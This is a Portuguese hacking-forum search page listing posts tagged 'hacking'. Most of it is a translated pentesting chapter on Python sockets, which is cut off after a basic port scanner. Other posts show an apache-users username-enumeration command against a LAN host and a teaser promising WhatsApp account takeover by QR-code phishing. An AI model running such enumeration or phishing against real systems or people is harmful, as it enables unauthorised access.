Ir para conteúdo

Pesquisar na Comunidade

Mostrando resultados para as tags ''hacking''



Mais opções de pesquisa

  • Pesquisar por Tags

    Digite tags separadas por vírgulas
  • Pesquisar por Autor

Tipo de Conteúdo


Fóruns

  • Fsociety Brasil
    • Administração
    • Sugestões
    • Apresentação de Membros
  • Desenvolvimento
    • Ferramentas
    • Projetos
    • Programação
  • Segurança da Informação
    • Hacker
    • Cracker
    • Leaks
    • Engenharia Social
    • CTF
  • Sistemas Operacionais (S.O)
    • Linux
    • Windows
    • Mac
  • Hardware
    • Tutoriais e Ferramentas
    • Dúvidas e discussões
    • Arduino
    • Raspberry
  • Off-Topic
    • BioHacking
    • Games, Emuladores, Crack, Cheater e afins
    • Cursos, apostilas e livros
    • Ciência, Tecnologia, Sociologia, Filosofia e Psicologia
    • Notícias, novidades, acontecimentos e teorias da conspiração
    • Design
    • Random, dúvidas e discussões

Encontrar resultados em...

Encontrar resultados que...


Data de Criação

  • Início

    FIM


Data de Atualização

  • Início

    FIM


Filtrar pelo número de...

Data de Registro

  • Início

    FIM


Grupo


Local


Sexo

Encontrado 37 registros

  1. Dicionário Hacker. Créditos TheCyberTeam DicionarioHacker(TheCybersTeamv1.1).pdf
  2. Olá pessoal tudo bem? A um tempo atrás venho desenvolvendo uma ferrameta Javascript para geração de dados falsos, ela é bem simples e qualquer um pode contribuir para o seu desenvolvimento, ainda não está muito bem documentada pois é um projeto de segundo plano para mim, básicamente ele tem algumas funcionalidades interessantes como gerar emails, nome de empresas, nome de pessoas, IPs, IPs locais, nomes de usuário e etc, em breve vou montar um gerador de CPF, então aqui o link: var JsonDataFaker = require("./FakeData"); console.log(JsonDataFaker.name());// nome completo // em todas as funções que geram nome você pode passar um parâmetro que é o gênero do nome // Male para homem -> JsonDataFaker.name(male) e female para mulher console.log(JsonDataFaker.firstName());// primeiro nome console.log(JsonDataFaker.lastName());// sobrenome console.log(JsonDataFaker.username());//um nome console.log(JsonDataFaker.email()); // email console.log(JsonDataFaker.ipv4()); //ip console.log(JsonDataFaker.ipv4Local());//ip local console.log(JsonDataFaker.emailDomain());//dominio de e-mail console.log(JsonDataFaker.domain());// dominio console.log(JsonDataFaker.companyName());//nomes de empresas console.log(JsonDataFaker.companyEmail());//e-mails corporativos https://github.com/techtuxbr/FakeData.js
  3. E ai pessoal, tudo bem com vocês? Hoje venho apresentar a ferramente apache-users. Apache-users é um script desenvolvido em Perl que enumera nomes de usuários do Apache que use o modulo UserDir. Para baixar essa ferramenta, basta clicar aqui. Como usar o apache-users [email protected]:~# apache-users USAGE: apache.pl [-h 1.2.3.4] [-l names] [-p 80] [-s (SSL Support 1=true 0=false)] [-e 403 (http code)] [-t threads] Executar contra o host remoto (-h 192.168.0.106) , passando um dicionário de nomes de usuários (-l /usr/share/wordlists/metasploit/unix_users.txt) , a porta a ser usada (-p 80) , desabilitar o SSL (-s 0) , especifique o código de erro HTTP (-e 403) , usando 10 threads (-t 10) [email protected]:~# apache-users -h 192.168.0.106 -l /usr/share/wordlists/metasploit/users.txt -p 80 -s 0 -e 403 -t 10 Vocês podem ver que é bem simples de usar essa ferramenta. Espero que tenham gostado, qualquer dúvida só deixar nos comentários ! Até a próxima, obrigado! Fiz um repost do meu blog aqui! https://rafaelcintralopes.com.br/enumerando-nomes-de-usuarios-do-apache/
  4. Como hackear WhatsApp? - Phishing no WhatsApp com QRL_Jacking Hackear WhatsApp... Um tema, peculiar, não? A gente pode pensar em várias estratégias... Backdoor APK, por exemplo, é uma alternativa... Mas, e se eu te dissesse que tem como vocêHackear WhatsApp com Phishing, o que você diria? - "Ah, Face... Você tá louco... É impossível Hackear WhatsApp dessa forma..." Pois é meu querido... Tem como! Para realizar esse ataque, você precisa utilizar a ferramenta QRL Jacking, que é uma ferramenta própria para aplicação de engenharia social em aplicações com QR code, como forma de login. Sabendo disso, a gente pode utilizar essa ferramenta para realizar um ataque no serviço WhatsApp Web e conseguir Hackear Whatsapp. Veja como:
  5. Sun Tzu

    Ios Hacking - book

    acesse por esse link www.it-docs.net/ddata/781.pdf
  6. Oi galera, estou tendo esse problema ao executar essa payload do titulo, HELP...!! tentei 2x cm portas diferentes e nd, já tentei até em outra versão do kali mas da na msma
  7. Apostila que achei por ai com algumas coisas Linkhttp://zempirians.com/ebooks/Learning Penetration Testing with Python.pdf
  8. Olá bípedes, tranquilo? Vocês conhecem algum podcast sobre algo que envolva, pentest, programação, TI e ETC.
  9. ---_ ......._-_--. (|\ / / /| \ \ / / .' -=-' `. / / .' ) _/ / .' _.) / / o o _.-' / .' \ _.-' / .'*| \______.-'// .'.' \*| \| \ | // .'.' _ |*| ` \|// .'.'_ _ _|*| . .// .'.' | _ _ \*| \`-|\_/ / \ _ _ \*\ `/'\__/ \ _ _ \*\ /^| \ _ _ \* ' ` \ _ _ \ ASH (+VK) \_ fonte: http://ascii.co.uk/art/snake = Python with Penetration Testing and Networking Penetration(pen) tester e hacker são termos semelhantes. A diferença é que pen-testers trabalham em uma organização para evitar às investidas de hackers, enquanto que um hacker geralmente trabalha para obter fama, vender vulnerabilidades por dinheiro, ou para explorar vulnerabilidades a fim de adiquirir algumas inimizades. Hackers bem treinados trabalham no campo de segurança da informação, invadindo um sistema e informando a vítima dos bugs de segurança para que eles possam ser corrigidos. Um hacker chamado de pentester é aquele que trabalha em uma empresa a fim de protejer seu sistema. Um pentester só inicia suas tentativas de quebrar a rede depois de obter a aprovação legal do cliente e, em seguida, apresenta um relatório de suas descobertas. Para se tornar um especialista em pentesting, uma pessoa deve ter profundo conhecimento dos conceitos de sua tecnologia. Neste capítulo, abordaremos os seguintes tópicos: • O escopo do pentesting • A necessidade do pentesting • Componentes a testar • Qualidades de um bom pentester • Abordagens do pentesting • Compreendendo os testes e ferramentas que você precisará • Network sockets • Métodos server socket • Métodos client socket • Métodos general socket • Exemplos práticos com socket • Socket exceptions • Métodos úteis do socket == Introducing the scope of pentesting Em simples palavras, penetration testing é o teste que avalia as políticas de segurança da informação de uma empresa. As medidas de segurança da informação envolvem a rede da empresa, banco de dados, site, servidores públicos e tudo o mais especificado pelo cliente. No final do dia, um pentester deve apresentar um relatório detalhado de suas descobertas, tais como instabilidades, vulnerabilidade na infra-estrutura da empresa, e o nível de risco da vulnerabilidade em particular, e fornecer soluções, se possível. === The need for pentesting Existem vários pontos que descrevem o significado do pentesting: * O pentesting identifica as ameaças que podem expor a confidencialidade de uma organização * Um Expert em pentesting fornece garantia para a organização com uma avaliação completa e detalhada da segurança organizacional * O pentesting avalia a eficiência da rede, produzindo uma enorme quantidade de tráfego e examina a segurança de dispositivos como firewalls, roteadores e switches * Alterar ou atualizar a infra-estrutura de software existente, hardware ou design de rede pode levar a vulnerabilidades que podem ser detectadas por pentesting * No mundo de hoje, as ameaças potenciais estão aumentando significativamente; Pentesting é um exercício proativo para minimizar a chance de ser "exploitado" * O Pentesting garante se as políticas de segurança adequadas estão sendo seguidas ou não Considere um exemplo de um e-commerce de nome que que gera sua renda com um serviço on-line. Um hacker ou grupo de hackers black hat encontram uma vulnerabilidade no site da empresa e a explora. Pode ser devastador a quantidade de prejuízo que eles podem causar. === Components to be tested Uma organização deve realizar uma operação de avaliação de risco antes do pentesting; isso ajudará a identificar as principais ameaças, como a má configuração ou vulnerabilidades em: * Roteadores, switches, ou gateways * Sistemas voltados para o público; Sites, DMZ, servidores de e-mail e sistemas remotos * DNS, firewalls, servidores proxy, FTP, e servidores web O teste de segurança deve ser executado em todos os componentes de hardware e software de um sistema em rede. === Qualities of a good pentester Os pontos a seguir descrevem as qualidades de um bom pentester. Ele deve: * Escolher um conjunto adequado de testes e ferramentas que equilibram custos e benefícios * Seguir procedimentos adequados com planejamento e documentação adequada * Estabelecer o escopo de cada teste, tais como objetivos, limitações e justificativa de procedimentos * Estar pronto para mostrar como explorar as vulnerabilidades * Indicar claramente os potenciais riscos achados no relatório final e fornecer métodos para a correção dos mesmos, se possível * Manter-se sempre atualizado porque a tecnologia está em constante evolução Um pentester testa a rede usando técnicas manuais ou ferramentas relevantes. Existem muitas ferramentas disponíveis no mercado. Algumas delas são de código aberto; outras muito caras. Com a ajuda da programação, você pode fazer suas próprias ferramentas. Ao criar suas próprias ferramentas, você pode esclarecer seus conceitos e também executar mais "R&D". Se você está interessado em pentesting e quer fazer suas próprias ferramentas, então a linguagem de programação Python é a melhor, pois conta com uma ampla variedade de pacotes para pentesting e é muito simples programar com ela. Esta simplicidade, juntamente com as bibliotecas de terceiros, tais como scapy e mechanize, reduz o tamanho do código. Em Python, para fazer um programa, você não precisa definir classes "gordas" como no Java. É mais produtivo escrever código em Python do que em C, e existem bibliotecas de alto nível para fazer praticamente qualquer tarefa imaginável. Se você já sabe um pouco sobre programação com Python e está interessado em pentesting este livro é ideal para você. === Deining the scope of pentesting Antes de entrar na fase do pentesting, o escopo do pentesting deve ser concebido. Os seguintes pontos devem ser considerados enquanto definimos o escopo: * Você deve desenvolver o escopo do projeto em consulta com o cliente. Por exemplo, se Bob (o cliente) quiser testar toda a infra-estrutura de rede da organização, então a pentester Alyosha definirá o escopo do pentesting levando essa rede em consideração. Alyosha consultará Bob quando houver alguma área a mais que precisa ser analizada * Você deve levar em conta o tempo, as pessoas e o dinheiro. * Você deve perfilar os limites do teste com base em um contrato assinado pelo pentester e pelo cliente. * As mudanças nas práticas da empresa podem afetar o escopo. Por exemplo, a adição de uma sub-rede, novas instalações de componentes, a adição ou modificação de um servidor web, e assim por diante, pode alterar o escopo do pentesting. O escopo do pentesting é definido em dois tipos de testes: * **Teste não destrutivo**: Este teste é limitado a encontrar e executar os testes sem riscos potenciais. Ele executa as seguintes ações: ** Escaneia e identifica potenciais vulnerabilidades no sistema remoto ** Investiga e verifica as descobertas ** Mapeia as vulnerabilidades com exploits apropriados ** Exploita o sistema remoto com o devido cuidado para evitar interrupções ** Fornece uma prova de conceito ** Não efetua um ataque de negação de serviço(DoS) * **Teste destrutivo**: Este teste pode produzir riscos. Ele executa as seguintes ações: ** Efetua ataques DoS e buffer overflows, que tem o potêncial de derrubar o sistema == Approaches to pentesting Existem três tipos de abordagens para pentesting: * **Black-box pentesting** segue a abordagem não-determinística de testes ** Você receberá apenas um nome de empresa ** Você deve agir - entre aspas - como um black hat(sem conhecimento prévio da infra) ** Não há necessidade de qualquer conhecimento prévio do sistema ** É demorado * **White-box pentesting** segue a abordagem determinista de testes ** Você receberá o conhecimento completo da infra-estrutura que precisa ser testada ** Serão fornecidas informações sobre a infra-estrutura da empresa, o tipo de rede, as políticas da empresa, os tópicos a fazer e a não fazer, o endereço IP e o firewall IPS/IDS * **Grey-box pentesting** segue uma abordagem híbrida de ambas as abordagens citadas acima: ** O pentester geralmente tem informações limitadas sobre a rede/sistema que é fornecido pelo cliente para reduzir os custos e diminuir tentativa e erro por parte do pentester ** Ele realiza a avaliação de segurança e os testes internamente == Introducing Python scripting Antes de começar a ler este livro, você deve conhecer os conceitos básicos da programação em Python, como a sintaxe básica, os tipos de variáveis, a estrutura de dado tupla, o dicionário, as funções, as strings, os métodos e assim por diante. Duas versões, 3.4 e 2.7.8, estão disponíveis em python.org/downloads/. Neste livro, todas as experiências e demonstrações foram feitas em Python versão 2.7.8. Se você usa o sistema operacional Linux como Kali ou BackTrack, então não haverá nenhum problema, porque muitos programas, como snifing wireless, não funcionam na plataforma Windows. O Kali Linux também usa a versão 2.7. Se você gosta de trabalhar no Red Hat ou CentOS, então esta versão é adequada para você A maioria dos hackers escolhem esta profissão porque eles não querem programar. Eles querem usar ferramentas. No entanto, sem programação, um hacker não pode melhorar suas habilidades. E de tempos em tempos eles procuram novas ferramentas na internet. Acredite em mim, depois de ver a sua simplicidade, você vai adorar esta linguagem. == Understanding the tests and tools you'll need Como você deve ter visto, este livro é dividido em sete capítulos. Para realizar varreduras e snifing pentesting, você precisará de uma pequena rede de dispositivos conectados. Se você não tem um laboratório, você pode fazer máquinas virtuais em seu computador. Para análise de tráfego sem fio, você deve ter uma rede sem fio. Para realizar um ataque na web, você precisará de um servidor Apache rodando na plataforma Linux. Será uma boa idéia usar CentOS ou Red Hat versão 5 ou 6 para o servidor web, pois contém os RPM's do Apache e PHP. Para o script Python, vamos usar a ferramenta Wireshark, que é de código aberto e pode ser executado no Windows, bem como plataformas Linux. == Learning the common testing platforms with Python Agora vamos começar a falar de pentesting; Espero que você esteja bem familiarizado com fundamentos de rede, como endereços IP, sub-redes classful, sub-redes sem classes, o significado das portas, endereços de rede e endereços de broadcast. Um pentester deve ser perfeito em fundamentos de redes, ou pelo menos entender bem um sistema operacional; Se você está pensando em usar o Linux, então você está no caminho certo. Neste livro, vamos executar nossos programas no Windows, bem como Linux. Neste livro, Windows, CentOS e Kali Linux serão usados. Um hacker sempre gosta de trabalhar em um sistema Linux. Como é livre e de código aberto, Kali Linux marca o renascimento do BackTrack e vem com um arsenal de ferramentas de hacking. Kali Linux NetHunter é a primeira plataforma de teste de penetração Android de código aberto para dispositivos Nexus. Algumas ferramentas funcionam no Linux e no Windows, mas no Windows, geralmente essas ferramentas não funcionam. Espero que você tenha conhecimento do Linux. Agora, é hora de trabalhar com redes em Python. == Network sockets Um network socket adress contém um endereço IP e um número de porta. De uma forma muito simples, um socket é uma maneira de falar com outros computadores. Por meio de um socket, um processo pode se comunicar com outro processo através da rede. Para criar um socket, use a função `socket.socket()` que está disponível no módulo socket. A sintaxe geral de uma função socket é a seguinte: [source,python] ---- s = socket.socket (socket_family, socket_type, protocol=0) ---- Aqui está a descrição dos parâmetros: `socket_family: socket.AF_INET, PF_PACKET` **AF_INET** é a família de endereços para **IPv4**. **PF_PACKET** opera na camada de driver de dispositivo. A biblioteca pcap para Linux usa **PF_PACKET**. Você verá mais detalhes sobre **PF_PACKET** no Capítulo 3, Snifing e Penetration Testing. Esses argumentos representam as famílias de endereços eo protocolo da camada de transporte: `Socket_type : socket.SOCK_DGRAM, socket.SOCK_RAW,socket.SOCK_STREAM` O argumento **socket.SOCK_DGRAM** descreve que UDP é confiável e sem conexão, e **socket.SOCK_STREAM** descreve que o TCP é confiável e é um serviço de conexão bidirecional. Discutiremos **socket.SOCK_RAW** no Capítulo 3, Snifing e Penetration Testing. `protocol` Geralmente, deixamos esse argumento; recebe 0 se não for especificado. Veremos o uso deste argumento no Capítulo 3, Sniffing and Penetration Testing. == Server socket methods * `socket.bind(address)`: Este método é usado para conectar o endereço(endereço IP, número da porta) ao socket. O socket deve estar aberto antes de se conectar ao endereço. * `socket.listen(q)`: Este método inicia a esculta TCP. O argumento q define o número máximo de conexões line-up. * `socket.accept()`: Usado para aceitar a conexão do cliente. Antes de usar este método, os métodos `socket.bind(address)` e `socket.listen(q)` devem ser usados. O método `socket.accept()` retorna dois valores: `client_socket` e `address`, onde `client_socket` é um novo objeto socket usado para enviar e receber dados através da conexão e o address é o endereço do cliente. Você verá exemplos mais tarde. == Client socket methods O único método dedicado ao cliente é o: * `socket.connect(address)`: Este método conecta o cliente ao servidor. O argumento `address` é o endereço do servidor. == General socket methods * `socket.recv(bufsize)`: Esse método recebe uma mensagem TCP do socket. O argumento `bufsize` define o máximo de dados que ele pode receber. * `socket.recvfrom(bufsize)`: Esse método recebe dados do socket. O método retorna um par de valores: o primeiro valor são dados recebidos, e o segundo valor é o endereço so socket que envia os dados. * `socket.recv_into(buffer)`: Este método recebe dados menores ou iguais a `buffer`. O parâmetro `buffer` é criado pelo método `bytearray()`. Discutiremos isso em um exemplo mais adiante. * `socket.recvfrom_into(buffer)`: Esse método obtém dados do socket e os gravam no buffer. É retornado dois valores(nbytes, address), onde `nbytes` é o número de bytes recebidos e `address` é o endereço do socket que envia os dados * `socket.send(bytes)`: Este método é usado para enviar dados para o socket. Antes de enviar os dados, verifique se o socket está conectado a uma máquina remota. Retorna o número de bytes enviados. * `socket.sendto(data, address)`: Este método é utilizado para enviar dados(parâmetro data) para o socket. Geralmente, usamos esse método em UDP. UDP é um protocolo sem conexão; Portanto, o socket não deve ser conectado a uma máquina remota, e no argumento address especifique o endereço da máquina remota. O valor de retorno fornece o número de bytes enviados. * `socket.sendall(data)`: Como o nome indica, este método envia todos os dados para o socket. Antes de enviar os dados, verifique se o socket está conectado a uma máquina remota. Esse método transfere incessantemente dados até que um erro seja encontrado. Se um erro for encontrado, uma exceção é lançada, e `socket.close()` fecha o socket. Então vamos a prática! == Moving on to the practical Primeiro, vamos fazer um programa server-side que oferece uma conexão com o cliente e envia uma mensagem para o mesmo. Crie o arquivo `server1.py` e adicione o seguinte código: [source,python] ---- import socket host = "192.168.1.2" #Server address port = 12345 #Port of Server s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((host,port)) #bind server s.listen(2) conn, addr = s.accept() print(addr, "Now Connected") conn.send("BSD is Life") conn.close() ---- O código precedente é muito simples; É o código mínimo no lado do servidor. Primeiro, importe o módulo socket e defina o host e o número da porta: **192.168.1.2** é o endereço IP do servidor. `socket.AF_INET` define a família do protocolo IPv4. `Socket.SOCK_STREAM` define a conexão TCP. A instrução `s.bind((host, port))` leva apenas um argumento. Liga(bind) o socket ao host e número de porta. A instrução `s.listen(2)` escuta a conexão e aguarda o cliente. A instrução `conn, addr = s.accept()` retorna dois valores: **conn** e **addr**. O socket **conn** é o socket cliente, como discutimos anteriormente. A função `conn.send()` envia a mensagem para o cliente. Finalmente, `conn.close()` fecha o socket. A partir dos exemplos a seguir com capturas de tela, você entenderá melhor o `conn`. Saída do programa server1.py: `$ python server1.py ` Agora o servidor está em listening(modo de escuta) aguardando o cliente: Dê uma olhada no código do client-side. Crie o arquivo client1.py e adicione as seguintes linhas: [source,python] ---- import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) host = "192.168.1.2" # server address port =12345 #server port s.connect((host,port)) print s.recv(1024) s.send("Hello Server") s.close() ---- No código anterior, vimos dois métodos novos: `s.connect((host, port))`, que conecta o cliente ao servidor, e `s.recv(1024)`, que recebe as strings enviadas pelo servidor. A saída do `client.py` e a resposta do servidor são mostradados na seguinte captura de tela: image::http://i.imgur.com/iUgdChG.png[img1] A saída mostra que o servidor aceitou a conexão de `192.168.1.5`. Não se confunda com a porta 42000; É a porta aleatória do cliente. Quando o servidor envia uma mensagem para o cliente, ele usa o socket conn, como mencionado anteriormente, e este socket contém o endereço IP do cliente e o número da porta. Como vimos na imagem acima, o servidor está no modo de escuta e o cliente se conecta ao servidor. Quando você executar o servidor/cliente novamente, a porta aleatória será alterada. Para o cliente, a porta do servidor **12345** é a porta de destino, e para o servidor, a porta aleatória do cliente **42000** é a porta de destino. Você pode estender a funcionalidade do servidor usando o loop while, conforme mostrado no seguinte programa. Execute o programa `server2.py`: [source,python] ---- import socket host = "192.168.1.2" port = 12345 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((host,port)) s.listen(2) while True: conn, addr = s.accept() print(addr, "Conexão bem sucedida") conn.send("BSD é VIDA!") conn.close() ---- O código anterior é o mesmo que o primeiro que vimos, apenas adicionamos um loop `while` infinito. Execute o programa `server2.py` em um host(no meu caso um FreeBSD), e o `client1.py` em outro host(no meu caso o Fedora). Observe o output(saída) do server2.py: image::http://i.imgur.com/Uq2nSfH.png[img2] Um servidor pode responder muitos clientes. O loop while mantém o programa do servidor vivo e não permite que o código pare de rodar. Você pode definir um limite de conexão para o loop while; Por exemplo, defina `while i > 10` e incremente 1 em i(i += 1) a cada conexão. Antes de prosseguir para o próximo exemplo, o conceito de `bytearray` deve ser entendido. O array `bytearray` é uma sequência mutável de inteiros unsigned no intervalo de 0 a 255. Você pode excluir, inserir ou substituir valores ou pedaços isolados. Os objetos do array `bytearray` podem ser criados chamando a matriz interna `bytearray`. A sintaxe geral de bytearray é: `bytearray([source[, encoding[, errors]]])` Vejamos um exemplo: ``` >>> m = bytearray("Heise Berg") >>> m[1] 101 >>> m[0] 72 >>> m[:5] = "Ollar" >>> m bytearray(b'Ollar Berg') >>> ``` Isto é um exemplo de slicing no `bytearray()`. Agora, vejamos a operação splitting no bytearray(): ``` >>> m = bytearray("Hello Heise") >>> m bytearray(b'Hello Heise') >>> m.split() [bytearray(b'Hello'), bytearray(b'Heise')] ``` Em seguida temos a operação append no bytearray(): ``` >>> m.append(33) >>> m bytearray(b'Hello Heise!') >>> ``` No próximo exemplo utilizaremos `s.recv_into(buff)`. Neste exemplo, usaremos `bytearray()` para criar um buffer de armazenamento de dados. Primeiro, execute o código server-side. segue abaixo o código do `server3.py`: [source,python] ---- import socket host = "192.168.1.2" port = 12345 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((host, port)) s.listen(1) conn, addr = s.accept() print("conectado em", addr) conn.send("Thanks") conn.close() ---- O programa anterior é o mesmo que vimos anteriormente. Neste programa, o servidor envia Thanks, seis caracteres. Agora execute o seguinte programa client-side: [source,python] ---- import socket host = "192.168.1.2" port = 12345 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) buf = bytearray("-" * 30) # buffer criado print("Numero de bytes ",s.recv_into(buf)) print(buf) s.close ---- No programa anterior, um parâmetro `buf` é criado usando `bytearray()`. A instrução `s.recv_into(buf)` fornece o número de bytes recebidos. O parâmetro `buf` nos dá a string recebida. Veja as imagens do exemplo apresentado: image::http://i.imgur.com/T0Fw6V8.png[img3] Nosso client recebeu com sucesso uma string de 6 bytes, `Thanks`. Agora, você já tem uma noção sobre `bytearray()`. Espero que você se lembre. Desta vez vou criar um socket UDP Execute `udp1.py`, e em seguida vamos discutir o código linha por linha: [source,python] ---- import socket host = "192.168.1.2" port = 12346 s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.bind((host,port)) data, addr = s.recvfrom(1024) print("received from ",addr) print("obtained ", data) s.close() ---- `socket.SOCK_DGRAM` cria um socket UDP, e `data, addr = s.recvfrom(1024)` retornam duas coisas: primeiro são os dados e a segunda é o endereço da fonte. Agora, veja o client-side. Execute `udp2.py`: [source,python] ---- import socket host = "192.168.1.2" port = 12345 s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) print(s.sendto("hello all",(host,port))) s.close() ---- Aqui, eu usei o socket UDP e o método `s.sendto()`, como você pode ver na definição do `socket.sendto()`. Você sabe muito bem que UDP é um protocolo sem conexão, então não há necessidade de estabelecer uma conexão aqui. A seguinte captura de tela mostra a saída de udp1.py(o servidor UDP) e udp2.py(o cliente UDP): image::http://i.imgur.com/7gmjvoa.png[img4] O server recebeu os dados com êxito. Vamos supor que um servidor está em execução e não há nenhuma conexão inicial com o cliente, pelo menos que ele tenha ouvido. Para evitar essa situação, use o `socket.timeout(value)`. Geralmente, passamos um valor inteiro; Se eu passo 5 como o valor, significa que ele vai esperar por 5 segundos. Se a operação não for concluída dentro de 5 segundos, será lançada uma exceção de tempo limite. Você também pode fornecer um valor do tipo float não-negativo. Por exemplo, vamos olhar para o seguinte código: [source,python] ---- import socket host = "192.168.1.2" port = 12345 s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.bind((host,port)) s.settimeout(5) data, addr = s.recvfrom(1024) print("recevied from ",addr) print("obtained ", data) s.close() ---- Eu adicionei uma linha extra, ou seja, `s.settimeout(5)`. O programa espera por 5 segundos; caso não haja conexões nesse intervalo, ele lança um erro. Execute udptime1.py. A saída é mostrada na seguinte imagem: image::http://i.imgur.com/d52rKiK.png[img5] O programa mostra um erro; tudo indica que ele não é um bom programa, pois seu erro é obscuro. O programa deve ser capaz manipular as exceções. === Socket exceptions Para lidar com exceções, usaremos os blocos `try` e `except`. O próximo exemplo lhe dirá como lidar com as exceções. Execute `udptime2.py`: [source,python] ---- import socket host = "192.168.1.3" port = 12345 s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: s.bind((host,port)) s.settimeout(5) data, addr = s.recvfrom(1024) print("recevied from ",addr) print("obtained ", data) s.close() except socket.timeout : print("Client not connected") s.close() ---- A saída é mostrada na seguinte imagem: image::http://i.imgur.com/EPyZ4zu.png[img6] No bloco try, eu coloco o meu código; no except, uma mensagem personalizada para ser exibida caso ocorra alguma exception. Diferentes tipos de exceções são definidos na biblioteca sockets do Python para diferentes erros. Vejamos algumas: * `exception socket.herror`: Este bloco detecta erros relacionados à endereços. * `exception socket.timeout`: Este bloco captura uma exceção quando o tempo limite de esculta do socket expirar. No exemplo anterior você pode ver que usamos `socket.timeout`. * `exception socket.gaierror`: Este bloco captura qualquer exceção que é gerada devido a `getaddrinfo()` e `getnameinfo()`. * `exception socket.error`: Este bloco detecta quaisquer erros relacionados a socket. Se você não tiver certeza sobre qualquer exceção lançar, você pode usá-lo. Em outras palavras, você pode dizer que é um bloco genérico que pega qualquer tipo de exceção. === Useful socket methods Você ganhou conhecimento sobre socket e sobre a arquitetura cliente-servidor. E você já é capaz de fazer um pequeno software networking. No entanto, o objetivo deste livro é testar e coletar informações em alguma rede. Python pode fazer isso de maneira elegante, ele possuí métodos úteis para coleta informações. Primeiro, `import socket` e use os seguintes métodos: * `socket.gethostbyname(hostname)`: Este método recebe um hostname como parâmetro e retorna um endereço IPv4. O endereço IPv4 é retornado na forma de string. Aqui está um exemplo: ``` >>> import socket >>> socket.gethostbyname('thapar.edu') '220.227.15.55' >>> >>> socket.gethostbyname('google.com') '173.194.126.64' >>> ``` Eu sei que você está pensando sobre o comando **nslookup**. Mais tarde, você verá mais bruxarias. * `socket.gethostbyname_ex (name)`: Este método converte um nome de host para um endereço IPv4 padrão. No entanto, a vantagem sobre o método anterior é que ele dá todos os endereços IP do nome de domínio. Ele retorna uma tupla (hostname, canonical name, and IP_addrlist) onde hostmane é dado por nós, canonical name é uma lista(possivelmente vazia) de nomes de host canônicos do servidor para o mesmo endereço e IP_addrlist é uma lista de todos os IPs disponíveis no mesmo hostname. Muitas vezes, um nome de domínio é hospedado em muitos endereços IP para equilibrar a carga do servidor. Infelizmente, este método não funciona para IPv6. Espero que você esteja bem familiarizado com tuplas, listas e dicionários. Vejamos um exemplo: ``` >>> import socket >>> socket.gethostbyname_ex('pt.org.br') ('pt.org.br', [], ['199.83.132.133', '199.83.128.133']) >>> >>> socket.gethostbyname_ex('google.com') ('google.com', [], ['172.217.29.78']) >>> >>> socket.gethostbyname_ex('facebook.com') ('facebook.com', [], ['31.13.85.36']) >>> ``` Ele retorna muitos endereços IP (ou não) de um único nome de domínio. Isso significa que um domínio como `pt.org.br` é executado em dois IPs. * `socket.gethostname()`: Isso retorna o hostname do sistema onde o interpretador Python está sendo executado atualmente: ``` >>> socket.gethostname() 'dhcppc0' >>> ``` Para obter o endereço IP da máquina atual usando o módulo socket, você pode usar o seguinte truque executando `socket.gethostbyname(socket.gethostname())`: ``` >>> socket.gethostbyname(socket.gethostname()) '200.148.457.114' >>> ``` Você sabe que o nosso computador tem muitas interfaces. Se você quiser saber o endereço IP de todas as interfaces, use a interface estendida: ``` >>> socket.gethostbyname_ex(socket.gethostname()) ('gvt.com.br', ['dhcppc0.gvt.com.br'], ['134.456.457.171']) >>> ``` Ele retorna uma tupla contendo três elementos: primeiro é o nome da máquina, segundo é uma lista de aliases para o nome do host e terceiro é a lista de endereços IP das interfaces(no meu caso só tenho uma). * `socket.getfqdn([name])`: Isso é usado para encontrar o fully qualified name, se estiver disponível. O fully qualified name consiste em um host e um nome de domínio; Por exemplo, beta pode ser o nome do host, e example.com pode ser o nome do domínio. O **fully qualified domain name(FQDN)** torna-se beta. example.com: ``` >>> socket.getfqdn('facebook.com') 'edge-star-mini6-shv-01-gru2.facebook.com' >>> ``` No exemplo anterior, edge-star-mini6-shv-01-gru2 é o nome do host, e facebook.com é o nome do domínio. No exemplo a seguir, FQDN não está disponível para thapar.edu: ``` >>> socket.getfqdn('thapar.com') 'thapar.com' >>> ``` Se o argumento name estiver em branco, ele retornará o nome da máquina atual: ``` >>> socket.getfqdn() 'gvt.com.br' ``` * `socket.gethostbyaddr(ip_address)`: Isso é como um "reverse" lookup para o nome. Ele retorna uma tupla (hostname, canonical name, and IP_addrlist) onde hostname é o nome do host que responde ao dado ip_address, o canonical name é uma lista (possivelmente vazia) de nomes canônicos do mesmo endereço e IP_addrlist é uma lista de endereços IP para a mesma interface de rede no mesmo host: ``` >>> socket.gethostbyaddr('31.13.85.36') ('edge-star-mini-shv-01-gru2.facebook.com', [], ['31.13.85.36']) >>> >>> socket.gethostbyaddr('119.18.50.66') Traceback (most recent call last): File "<stdin>", line 1, in <module> socket.herror: [Errno 1] Unknown host >>> ``` Ele mostra um erro na última consulta porque o DNS lookup não está presente. * `socket.getservbyname(servicename[, protocol_name])`: Isso converte qualquer protocol name para o número da porta correspondente. O nome do protocolo é opcional, TCP ou UDP. Por exemplo, o serviço DNS usa TCP, bem como conexões UDP. Se o nome do protocolo não for fornecido, qualquer protocolo pode corresponder: ``` >>> socket.getservbyname('http') 80 >>> socket.getservbyname('smtp','tcp') 25 >>> ``` * `socket.getservbyport(port[, protocol_name])`: Isso converte um número de porta de um protocolo para o nome do serviço correspondente. O nome do protocolo é opcional, TCP ou UDP: ``` >>> socket.getservbyport(80) 'http' >>> socket.getservbyport(23) 'telnet' >>> socket.getservbyport(445) 'microsoft-ds' >>> ``` * `socket.connect_ex(address)`: Esse método retorna um indicador de erro. Se obter êxito. Ele `retorna 0`; Caso contrário, ele retorna a variável `errno`. Você pode aproveitar esta função para escanear as portas. Execute o programa `connet_ex.py`: [source,python] ---- import socket rmip ='127.0.0.1' portlist = [22,23,80,912,135,445,20] for port in portlist: sock= socket.socket(socket.AF_INET,socket.SOCK_STREAM) result = sock.connect_ex((rmip,port)) print(port,":", result) sock.close() ---- A saída é mostrada na seguinte imagem: image::http://i.imgur.com/jZgqJNH.png[img7] A saída do programa anterior mostra que somente a porta 22 está aberta. Este é um scanner de porta rudimentar. Caso não encontre portas abertas, execute isso em outro dispositivo com uma grande lista de portas. Desta vez você terá que usar 